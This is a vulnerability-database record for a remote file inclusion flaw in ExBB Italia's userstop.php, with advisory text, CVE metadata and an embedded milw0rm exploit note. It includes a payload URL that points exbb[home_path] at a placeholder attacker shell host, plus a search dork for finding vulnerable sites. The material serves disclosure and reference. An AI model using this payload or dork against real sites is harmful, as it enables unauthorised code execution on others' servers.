ExBB Italia userstop.php exbb[home_path] Variable Remote File Inclusion
2006-08-29T04:49:07
ID OSVDB:28251 Type osvdb Reporter SHiKaA(SHiKaA@hotmail.com) Modified 2006-08-29T04:49:07
Description
Vulnerability Description
ExBB Italia contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to userstop.php not properly sanitizing user input supplied to the 'exbb[home_path]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
Technical Description
This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).
Solution Description
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
Short Description
ExBB Italia contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to userstop.php not properly sanitizing user input supplied to the 'exbb[home_path]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
{"type": "osvdb", "published": "2006-08-29T04:49:07", "href": "https://vulners.com/osvdb/OSVDB:28251", "hashmap": [{"key": "affectedSoftware", "hash": "070f226cc01dcafe54a02f0ac0e8d8e9"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "46814f28a26d28b15e6d4a52953f9fbf"}, {"key": "cvss", "hash": "88e04999358e76acae57a21bcf224d40"}, {"key": "description", "hash": "a4f3419b08c06a6f873ac565dc38d356"}, {"key": "href", "hash": "633fd409d40d4a3428b5af7c94c80a41"}, {"key": "modified", "hash": "df03a3af8d25fbaca32277ea92424348"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "df03a3af8d25fbaca32277ea92424348"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "7a45fc0c28c76d33a9ea3633ded1cf41"}, {"key": "title", "hash": "7308783e689fc780d9b631bb77043da9"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 5.1}, "viewCount": 4, "history": [], "edition": 1, "objectVersion": "1.2", "reporter": "SHiKaA(SHiKaA@hotmail.com)", "title": "ExBB Italia userstop.php exbb[home_path] Variable Remote File Inclusion", "affectedSoftware": [{"operator": "eq", "version": "0.2", "name": "ExBB Italia"}, {"operator": "eq", "version": "0.1", "name": "ExBB Italia"}], "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2017-04-28T13:20:24"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4488"]}, {"type": "exploitdb", "idList": ["EDB-ID:2273"]}], "modified": "2017-04-28T13:20:24"}, "vulnersScore": 6.8}, "references": [], "id": "OSVDB:28251", "hash": "5e71501ab96ba759d24d010c4a8b36db1ff4659fd828d1d49449266d1c8645bd", "lastseen": "2017-04-28T13:20:24", "cvelist": ["CVE-2006-4488"], "modified": "2006-08-29T04:49:07", "description": "## Vulnerability Description\nExBB Italia contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to userstop.php not properly sanitizing user input supplied to the 'exbb[home_path]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nExBB Italia contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to userstop.php not properly sanitizing user input supplied to the 'exbb[home_path]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://[attacker]?\n## References:\nVendor URL: http://www.exbb.altervista.org/\n[Secunia Advisory ID:21681](https://secuniaresearch.flexerasoftware.com/advisories/21681/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0553.html\nGeneric Exploit URL: http://milw0rm.com/exploits/2273\nFrSIRT Advisory: ADV-2006-3412\n[CVE-2006-4488](https://vulners.com/cve/CVE-2006-4488)\nBugtraq ID: 19753\n"}
{"cve": [{"lastseen": "2019-05-29T18:08:33", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in modules/userstop/userstop.php in ExBB Italia 0.2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the exbb[home_path] parameter.", "modified": "2017-10-19T01:29:00", "id": "CVE-2006-4488", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4488", "published": "2006-08-31T22:04:00", "title": "CVE-2006-4488", "type": "cve", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T15:54:05", "bulletinFamily": "exploit", "description": "ExBB Italiano <= 0.2 exbb[home_path] Remote File Include Vulnerability. CVE-2006-4488. Webapps exploit for php platform", "modified": "2006-08-29T00:00:00", "published": "2006-08-29T00:00:00", "id": "EDB-ID:2273", "href": "https://www.exploit-db.com/exploits/2273/", "type": "exploitdb", "title": "ExBB Italiano <= 0.2 - exbbhome_path Remote File Include Vulnerability", "sourceData": "#==============================================================================================\n#ExBB Italian version <= v2.0 (home_path) Remote File Inclusion Exploit\n#===============================================================================================\n# \n#Critical Level : Dangerous \n# \n#Venedor site : http://www.exbb.altervista.org/ \n# \n#Version : 2.0 \n# \n#================================================================================================\n#Bug in : smodules/userstop/userstop.php\n#\n#Vlu Code :\n#--------------------------------\n# <?\n# include($exbb['home_path'].'modules/userstop/data/userstop_conf.php');\n# include($exbb['home_path'].'modules/userstop/language/'.$exbb['default_lang'].'/lang.php')\n# \n#\n#================================================================================================\n#\n#Exploit :\n#--------------------------------\n#\n#http://sitename.com/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://SHELLURL.COM?\n#\n#DOrk : in Yahoo.it =====> \"Powered by ExBB \"\n#================================================================================================\n#Discoverd By : SHiKaA\n#\n#Conatact : SHiKaA-[at]hotmail.com\n#\n#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior\n==================================================================================================\n\n# milw0rm.com [2006-08-29]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2273/"}]}